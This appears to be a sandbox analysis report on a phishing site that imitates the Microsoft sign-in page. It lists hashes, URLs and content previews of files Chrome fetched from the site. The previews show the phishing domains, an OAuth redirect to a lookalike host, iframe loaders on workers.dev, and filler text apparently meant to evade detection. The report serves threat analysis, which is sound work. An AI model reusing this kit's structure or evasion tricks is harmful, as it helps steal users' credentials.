                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,l,s,v){W=b,function(c,e,V,f,g){for(V=b,f=c();!![];)try{if(g=parseInt(V(216))/1+-parseInt(V(236))/2*(parseInt(V(223))/3)+-parseInt(V(266))/4*(-parseInt(V(211))/5)+parseInt(V(189))/6*(parseInt(V(165))/7)+-parseInt(V(192))/8+parseInt(V(260))/9+-parseInt(V(249))/10,g===e)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,189763),h=this||self,i=h[W(163)],j=function(X,e,f,g){return X=W,e=String[X(276)],f={'h':function(E){return null==E?'':f.g(E,6,function(F,Y){return Y=b,Y(169)[Y(231)](F)})},'g':function(E,F,G,Z,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(Z=X,null==E)return'';for(I={},J={},K='',L=2,M=3,N=2,O=[],P=0,Q=0,R=0;R<E[Z(221)];R+=1)if(S=E[Z(231)](R),Object[Z(256)][Z(245)][Z(181)](I,S)||(I[S]=M++,J[S]=!0),T=K+S,Object[Z(256)][Z(245)][Z(181)](I,T))K=T;else{if(Object[Z(256)][Z(245)][Z(181)](J,K)){if(256>K[Z(185)](0)){for(H=0;H<N;P<<=1,F-1==Q?(Q=0,O[Z(268)](G(P)),P=0):Q++,H++);for(U=K[Z(185)](0),H=0;8>H;P=1.45&U|P<<1,Q==F-1?(Q=0,O[Z(268)](G
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3233)
                                                    Category:downloaded
                                                    Size (bytes):4532
                                                    Entropy (8bit):5.710344426211016
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CD9A11EB7E4193F051B3CE4C9460CA9E
                                                    SHA1:5E437CF9603F5C39967D6BC336119A5D0A03FA32
                                                    SHA-256:2A44F73AA9DE1E8835030C3F029242B04EAF46DE8ED4CBFDD451537975D01C63
                                                    SHA-512:DF13CB1F913603178F1F5A8BCB34B43A86C8A1A10A89B3D554C9A08D9335DA3E410A722693C48046B70FCD7B537D07AEE6B933E054CAAF4BE549F55B9551822A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.pguhmxcggroup.top%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATmnA_deEXsrO-29kc-_kX-vLMYOeNzMsvAKlcxKhM2Tv8CI-MLRsZJTIK5xSWpxSUOKfm5iZl5IKlbTIL-RemeKeHFbqkpqUWJJZn5eY-YMdVdYBF4xcJjwGzFwcElwCDBoMDwg4VxESvQdRFcb0py_q1w2NfCLaBxmYHhFKt-mbenW3JZQKSTl3GFX2qxi1-OT0SlYUZYUoF2lKlrVZR3Un5VakWihYmRha2lleEENqEJbEyn2Bg-sDF2sDPMYmc4wMm4gYfxAC_DD76rc9fdO9J65p3HK36dMLOSjAAD45IQx-Ds0pzk4ICw3My0snT9MPfcCD-DYu9AD-_k4ih3L0sDV9sNAgwPBBgA0&estsfed=1&uaid=b155cf9c16d44dcdb687e24c4f724f0d&fci=https%3a%2f%2fportal.pguhmxcggroup.top.orgid.com&username=mstest%40gmail.com&login_hint=mstest%40gmail.com
                                                    Preview: ServerInfo: BL02EPF0001D76B 2024.11.19.17.52.40 LocVer:0 --> PreprocessInfo: CBA-1119_173001:cb7f391ec00000E, 2024-11-19T17:46:43.0922282-08:00 - Version: 16,0,30435,8 -->. -----Error Info------------------------------------------."/pp1600/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.pguhmxcggroup.top%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATmnA_deEXsrO-29kc-_kX-vLMYOeNzMsvAKlcxKhM2Tv8CI-MLRsZJTIK5xSWpxSUOKfm5iZl5IKlbTIL-RemeKeHFbqkpqUWJJZn5eY-YMdVdYBF4xcJjwGzFwcElwCDBoMDwg4VxESvQdRFcb0py_q1w2NfCLaBxmYHhFKt-mbenW3JZQKSTl3GFX2qxi1-OT0SlYUZYUoF2lKlrVZR3Un5VakWihYmRha2lleEENqEJbEyn2Bg-sDF2sDPMYmc4wMm4gYfxAC_DD76rc9fdO9J65p3HK36dMLOSjAAD45IQx-Ds0pzk4ICw3My0snT9MPfcCD-DYu9AD-_k4ih3L0sDV9sNAgwPBBgA0&estsfed=1&uaid=b155cf9c16d44dcdb687e24c4f724f0d&fci=https%3a%2f%2fpor
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text
                                                    Category:downloaded
                                                    Size (bytes):468
                                                    Entropy (8bit):5.481069915820355
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CB3CBF36F0758C558AA8319C95EB515B
                                                    SHA1:CB426D14F69DCAC7E236B4C4B15EBA4BB4AAE0B9
                                                    SHA-256:F5BA8B34F51522DECE9E6B190EE7B3CD0044BAB9CC5F73179CDF7EB07E810F1D
                                                    SHA-512:1D71F387FC1476059D1C3F9751F8CD2C94A434DE770906A5C04CAC54F1653A09B958EF294C9306293CB85DDC77D4823392BC7E2D0EE88A2F53D60E193CBC46DF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t
                                                    Preview:<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title></title>.</head>.<body>. <iframe height="100%" width="100%" sandbox="allow-top-navigation allow-scripts allow-same-origin" src="https://4i7ecmz95n2.xbslqfequn.workers.dev?4db3f7=aHR0cHM6Ly9sb2dpbi5wZ3VobXhjZ2dyb3VwLnRvcC8/QjY2MmdPOENXMEU9YUhSMGNITTZMeTl2Wm1acFkyVXVZMjl0" frameborder="0" </iframe>.. </iframe>.</body>.</html>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 47 x 10, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.9902101553250042
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:895AEB12E256799CECAD98776EA5FA89
                                                    SHA1:7097702A5BC2C9F7B0DABF3C967FCC167094596C
                                                    SHA-256:245DD3C6A1B3FE2643A95489E48EF0D442F7A2A8CB5855120EA95B2589C4B452
                                                    SHA-512:AC2A022DA0EDBC42440444332FBAFD05B2DFB0F4DC82EA850FE5C5D865A0350CD126902150D76FC966F448B0BC02232410BAB894605CFE6206817BFB761C0622
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fef4ef4eb8e4376/1736372034464/Zlmx5fFzJrDt_TZ
                                                    Preview:.PNG........IHDR.../..........$.~....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                    Category:downloaded
                                                    Size (bytes):17174
                                                    Entropy (8bit):2.9129715116732746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12E3DAC858061D088023B2BD48E2FA96
                                                    SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                    SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                    SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                    Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (32016)
                                                    Category:dropped
                                                    Size (bytes):57510
                                                    Entropy (8bit):5.3728935008680745
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:23C7FEEF919F9374C1B26F019804CDA8
                                                    SHA1:3E22BA24CFD4F5A1C4D189AAADB1A82A867377C0
                                                    SHA-256:993A5748DB7B6BC125F88788845A7599234130BCE2858B528071035488CB886D
                                                    SHA-512:93D4D19CA4BACFC0AD64690E2426D573D47991DAF772D178D5C477369675539274A5E97C666A97A49AD0EC82E566EF4B71E967E7D7FFC575FBD2171E06791276
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (315)
                                                    Category:downloaded
                                                    Size (bytes):507
                                                    Entropy (8bit):5.538985501927134
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:36717D2564C8F9F70FE76584D2B86D49
                                                    SHA1:6393388FEE876ED21E32D1EF4CA0E1DAAE0D4DD2
                                                    SHA-256:1A5E59363F656C230EBFF7B6C531F9CCD010D2544AA4DC0B810E8DC9E7C49876
                                                    SHA-512:8FB47DC0DEF4FF25F3F073AEC32D97843684B533CDBCEB8477DDF0620209E52D4F46E2FF5C7A57FF3D23251EA21625812849EC5D60CAF9B73BD8C17A110CA4A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.pguhmxcggroup.top/?B662gO8CW0E=aHR0cHM6Ly9vZmZpY2UuY29t&omn=bXN0ZXN0QGRvbWFpbi5jb20=
                                                    Preview:<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title></title>.</head>.<body>. <iframe height="100%" width="100%" sandbox="allow-top-navigation allow-scripts allow-same-origin" src="https://iyd4h7bj22.xbslqfequn.workers.dev?caa3fd=aHR0cHM6Ly9sb2dpbi5wZ3VobXhjZ2dyb3VwLnRvcC8/QjY2MmdPOENXMEU9YUhSMGNITTZMeTl2Wm1acFkyVXVZMjl0Jm9tbj1iWE4wWlhOMFFHUnZiV0ZwYmk1amIyMD0=" frameborder="0" </iframe>.. </iframe>.</body>.</html>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64616)
                                                    Category:downloaded
                                                    Size (bytes):450739
                                                    Entropy (8bit):5.4497518750395795
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8D204697D0BDA2F898127235A45EE960
                                                    SHA1:B03DF4EA2B211B931AA22774BC89F09FF9EBC9FC
                                                    SHA-256:3C9DFE3E933E6833E6ABA9BDD3798360279EC3BC4263C2B396DE3D01809347C5
                                                    SHA-512:ECFE7BAC24C252C02663C4B00FE64EA4ABBA836FB5571A936332889A722859C75F3E6C345C6477E93DBC8DDDFDDDFF36536E502F13B6AA5FE4EB832990D94B22
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewdefijbfjhi.pguhmxcggroup.top/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 107x23, components 3
                                                    Category:dropped
                                                    Size (bytes):2797
                                                    Entropy (8bit):7.505606447654921
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5EC86907C1AC5EF3E117723998FEB8BE
                                                    SHA1:5DAA2FEA5A34B0479A33698FC875F9F6C0581FD2
                                                    SHA-256:BC2B16B51738B77D94ED7591AD1033FA804297CA9FAAA35222AA65773F749164
                                                    SHA-512:AC052ED698BC59B14694C6A47979D20819658620896831E9A538C33AA0083659F2926773FFC3082C9965736C7C6EF11DACCBA8DD3B3C427B535EE2B88BA435E5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:......Exif..II*.................Ducky.......P.....zhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:41705e1d-4a9a-1f43-8b65-c2b849c8cb4b" xmpMM:DocumentID="xmp.did:0E95A8B5216911E4B0C2C542DFA6230D" xmpMM:InstanceID="xmp.iid:0E95A8B4216911E4B0C2C542DFA6230D" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:08ef3156-8bdf-8743-b5ba-46ec26c23b1b" stRef:documentID="xmp.did:41705e1d-4a9a-1f43-8b65-c2b849c8cb4b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.990210155325004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3221)
                                                    Category:downloaded
                                                    Size (bytes):6004
                                                    Entropy (8bit):5.552341284414869
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:745C90E248246EED3687640246608CAD
                                                    SHA1:1B2994850FB3427A34FEEA414B8272D01FD08691
                                                    SHA-256:B9B23FEA0BEE245FD54965A9A75351E5D4C653DB694AF341ABCD44FAF5E20786
                                                    SHA-512:D00048DBF49529DDD15BEC1257EB41BDF57AB373652997F5D26477DA2DD31D417CD49CC7747D4FBFFB3C368EF43415D9EA1E35A4CBB7E86B19D9DFE4BC55AB65
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://iyd4h7bj22.xbslqfequn.workers.dev/?caa3fd=aHR0cHM6Ly9sb2dpbi5wZ3VobXhjZ2dyb3VwLnRvcC8/QjY2MmdPOENXMEU9YUhSMGNITTZMeTl2Wm1acFkyVXVZMjl0Jm9tbj1iWE4wWlhOMFFHUnZiV0ZwYmk1amIyMD0=
                                                    Preview:.<html lang="en">.<head>..<title></title>.. <span>Of course, however, persimmons have begun to rent cats over the past few months, specifically for kittens associated with their kangaroos.</span> -->..<meta charset="UTF-8">..<meta name="robots" content="noindex, nofollow">..<meta name="viewport" content="width=device-width, initial-scale=1.0">..<script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <div>However, hippopotamus have begun to rent hamsters over the past few months, specifically for wolfs associated with their crocodiles.</div> -->..<style>body{font-family:Arial,sans-serif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-size:1.25rem;display:block}.mt-2{margin-top:.5rem}.mt-5{margin-top:3rem}.text-muted{color:#6c757d}</style>.</head>.<body>... <span>However, however, prunes have begun to rent foxes over the past few months, specifically for cranberries associate
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):1592
                                                    Entropy (8bit):4.205005284721148
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4E48046CE74F4B89D45037C90576BFAC
                                                    SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                    SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                    SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text
                                                    Category:downloaded
                                                    Size (bytes):315
                                                    Entropy (8bit):5.0572271090563765
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                    SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                    SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                    SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://jackoffjackofflilliilkillxoopoeadonline.top/favicon.ico
                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:downloaded
                                                    Size (bytes):2672
                                                    Entropy (8bit):6.640973516071413
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:166DE53471265253AB3A456DEFE6DA23
                                                    SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                    SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                    SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                    Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):3651
                                                    Entropy (8bit):4.094801914706141
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                    SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                    SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                    SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):3452
                                                    Entropy (8bit):5.117912766689607
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CB06E9A552B197D5C0EA600B431A3407
                                                    SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                    SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                    SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.live.com/Me.htm?v=3
                                                    Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):28
                                                    Entropy (8bit):4.307354922057605
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                    SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                    SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                    SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkwSi-AErHeUhIFDdFbUVISBQ1Xevf9?alt=proto
                                                    Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47520)
                                                    Category:dropped
                                                    Size (bytes):47521
                                                    Entropy (8bit):5.398500199255723
                                                    Encrypted:false
                                                    SSDEEP:
